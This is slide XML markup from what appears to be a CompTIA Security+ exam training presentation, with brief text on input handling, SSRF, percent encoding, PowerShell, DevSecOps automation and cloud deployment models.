                <a:lnTo>
                  <a:pt x="10389287" y="19603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10348715" y="5094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10304525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749797" y="2898139"/>
            <a:ext cx="502793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Identifies</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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ck</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>fr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15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15">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF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2200" spc="-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8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8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65">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ages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15995" y="3892296"/>
            <a:ext cx="10497820" cy="1155700"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10497819" h="1155700">
                <a:moveTo>
                  <a:pt x="10304780" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="192531" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148396" y="5086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107875" y="19575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72127" y="42307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42307" y="72127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19575" y="107875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5086" y="148396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="192531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="962659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5086" y="1006795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19575" y="1047316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42307" y="1083064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72127" y="1112884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107875" y="1135616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148396" y="1150105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="192531" y="1155191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10304780" y="1155191"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10348915" y="1150105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10389436" y="1135616"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10425184" y="1112884"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10455004" y="1083064"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10477736" y="1047316"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10492225" y="1006795"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10497312" y="962659"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10497312" y="192531"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10492225" y="148396"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10477736" y="107875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10455004" y="72127"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10425184" y="42307"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10389436" y="19575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10348915" y="5086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10304780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643117" y="4276725"/>
            <a:ext cx="524192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Saves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information</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>leak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caused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errors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02604" y="5766257"/>
            <a:ext cx="505015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Improper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Input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Handling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ensures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that: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15995" y="6399276"/>
            <a:ext cx="10497820" cy="1156970"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10497819" h="1156970">
                <a:moveTo>
                  <a:pt x="10304525" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="192786" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148596" y="5094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108024" y="19603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72227" y="42367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42367" y="72227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19603" y="108024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5094" y="148596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="192786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="963930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5094" y="1008119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19603" y="1048691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="42367" y="1084488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="72227" y="1114348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="108024" y="1137112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="148596" y="1151621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="192786" y="1156716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10304525" y="1156716"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10348715" y="1151621"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10389287" y="1137112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10425084" y="1114348"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10454944" y="1084488"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10477708" y="1048691"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10492217" y="1008119"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10497312" y="963930"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10497312" y="192786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10492217" y="148596"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10477708" y="108024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10454944" y="72227"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10425084" y="42367"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10389287" y="19603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10348715" y="5094"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10304525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520944" y="6784975"/>
            <a:ext cx="548513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ut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va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8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passed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th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pro</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>gram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va</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-8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9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02508" y="1187196"/>
            <a:ext cx="3974591" cy="36575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07916" y="784098"/>
            <a:ext cx="272605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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Key</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-10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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Takeaways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1906523"/>
            <a:ext cx="457200" cy="4572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3276600"/>
            <a:ext cx="457200" cy="4572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4599432"/>
            <a:ext cx="457200" cy="4572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85697" y="1883156"/>
            <a:ext cx="8818245" cy="521906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Percent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encoding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method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allows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user-agent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submit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any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safe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endParaRPr sz="2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unsafe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character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(or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binary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data)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server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within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URL.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250">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="180975">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
            </a:pP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server-side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request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forgery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(SSRF)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causes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server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make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API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calls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HTTP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requests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with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arbitrary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parameters.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850">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="997585">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="15">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Powe</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="1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el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pref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meth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perf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rmin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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>W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ndows 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administration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tasks.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750">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="1076325">
              <a:lnSpc>
                <a:spcPct val="114999"/>
              </a:lnSpc>
            </a:pP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DevSecOps,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security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tasks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require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increased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automation.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Aut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mati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completi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admi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ive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sk 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without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human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intervention.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5910071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0960" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="8333740" marR="5080" indent="-2419350">
              <a:lnSpc>
                <a:spcPts val="3020"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" spc="170"/>
              <a:t>Com</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="135"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="55"/>
              <a:t>TI</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="85"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-80"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="65"/>
              <a:t>Security+</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-120"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="70"/>
              <a:t>Certificatio</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-100"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-130"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-125"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="114"/>
              <a:t>SY</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="140"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-130"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-40"/>
              <a:t>601  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="140"/>
              <a:t>Exam</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-120"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="85"/>
              <a:t>Training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888" y="231647"/>
            <a:ext cx="3236976" cy="9144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993898" y="4258436"/>
            <a:ext cx="6209030" cy="835660"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="60960" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="2261870" marR="5080" indent="-2249805">
              <a:lnSpc>
                <a:spcPts val="3020"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" spc="185"/>
              <a:t>Domai</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="195"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140"/>
              <a:t>4:</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-120"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="215"/>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="160"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="100"/>
              <a:t>er</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="110"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="120"/>
              <a:t>tion</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="120"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175"/>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-120"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90"/>
              <a:t>Incident  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="125"/>
              <a:t>Response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888" y="231647"/>
            <a:ext cx="3236976" cy="9144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27323" y="4258436"/>
            <a:ext cx="6655434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40"/>
              <a:t>Implementing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-130"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="75"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-130"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="105"/>
              <a:t>Cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-110"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="114"/>
              <a:t>Solutions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9143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02278" y="784098"/>
            <a:ext cx="3538854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10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Learning</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="70">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Objectives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9692" y="1187196"/>
            <a:ext cx="4820411" cy="36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97763" y="2254757"/>
            <a:ext cx="6913880" cy="25088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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>By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en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thi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lesson,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you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w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ll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abl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:</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="626110" marR="5080">
              <a:lnSpc>
                <a:spcPts val="8720"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="580"/>
              </a:spcBef>
            </a:pP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v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aluat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secur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clou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vir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ual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za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ti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ser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v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ices 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Apply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clou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securit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solutions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11605" y="5576442"/>
            <a:ext cx="5202555" cy="15214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Analyze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fra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structur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cod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concepts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Elabora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oud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stor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ge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sec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rity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3191255"/>
            <a:ext cx="457200" cy="4572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4299203"/>
            <a:ext cx="457200" cy="4572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5472684"/>
            <a:ext cx="457200" cy="4572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6652259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761" y="4258436"/>
            <a:ext cx="4065904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75"/>
              <a:t>Secure</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="105"/>
              <a:t>Cloud</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-120"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="114"/>
              <a:t>Solutions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90691" y="306451"/>
            <a:ext cx="467233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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cloud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135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deployment</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="180">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Models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5276" y="760476"/>
            <a:ext cx="6516624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780790" y="1756298"/>
            <a:ext cx="8691880" cy="1049655"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="1885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485"/>
              </a:spcBef>
            </a:pP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clou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deployment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mode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di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how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ser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v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ices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pro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vis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oned.</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="1270">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1395"/>
              </a:spcBef>
            </a:pP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ca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catego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ized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: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847469" y="3296792"/>
            <a:ext cx="12563475" cy="1972945"/>
            <a:chOff x="1847469" y="3296792"/>
            <a:chExt cx="12563475" cy="1972945"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1869186" y="3306317"/>
              <a:ext cx="4319270" cy="581025"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="581025">
                  <a:moveTo>
                    <a:pt x="4222242" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="96774" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59096" y="7602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28336" y="28336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7602" y="59096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="96774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="580644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="580644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="96774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4311413" y="59096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4290679" y="28336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4259919" y="7602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4222242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869186" y="3306317"/>
              <a:ext cx="4319270" cy="581025"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="581025">
                  <a:moveTo>
                    <a:pt x="96774" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4222242" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4259919" y="7602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4290679" y="28336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4311413" y="59096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="96774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="580644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="580644"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="96774"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7602" y="59096"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="28336" y="28336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="59096" y="7602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96774" y="0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856994" y="3775709"/>
              <a:ext cx="12544425" cy="1484630"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1484629">
                  <a:moveTo>
                    <a:pt x="12422123" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="121919" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74473" y="9584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35718" y="35718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9584" y="74473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="121919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1362455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9584" y="1409902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35718" y="1448657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74473" y="1474791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121919" y="1484376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12422123" y="1484376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12469570" y="1474791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12508325" y="1448657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12534459" y="1409902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="1362455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="121919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12534459" y="74473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12508325" y="35718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12469570" y="9584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124221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856994" y="3775709"/>
              <a:ext cx="12544425" cy="1484630"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="12544425" h="1484629">
                  <a:moveTo>
                    <a:pt x="0" y="121919"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="9584" y="74473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35718" y="35718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74473" y="9584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121919" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12422123" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12469570" y="9584"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12508325" y="35718"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12534459" y="74473"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="121919"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12544044" y="1362455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12534459" y="1409902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12508325" y="1448657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12469570" y="1474791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12422123" y="1484376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="121919" y="1484376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74473" y="1474791"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35718" y="1448657"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9584" y="1409902"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1362455"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="121919"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19049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2052320" y="3342259"/>
            <a:ext cx="11811000" cy="17030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Public</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="22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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(multi-tenant)</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="355600" marR="5080" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="264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CSPs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provide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this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service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cloud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consumers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over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Internet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shared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among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the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subscribers.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1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Organizations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with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multi-cloud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architecture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use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multiple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CSPs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services.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859660" y="5866257"/>
            <a:ext cx="4338320" cy="592455"/>
            <a:chOff x="1859660" y="5866257"/>
            <a:chExt cx="4338320" cy="592455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="object 12"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1869185" y="5875782"/>
              <a:ext cx="4319270" cy="573405"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="573404">
                  <a:moveTo>
                    <a:pt x="4223512" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="95503" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58346" y="7510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="27987" y="27987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7510" y="58346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="95503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="573023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="573023"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4319016" y="95503"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4311505" y="58346"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4291028" y="27987"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260669" y="7510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4223512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869185" y="5875782"/>
              <a:ext cx="4319270" cy="573405"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4319270" h="573404">
                  <a:moveTo>
                    <a:pt x="95503" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4223512" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4260669" y="7510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4291028" y="27987"/>
                  </a:lnTo>
                  <a:lnTo>
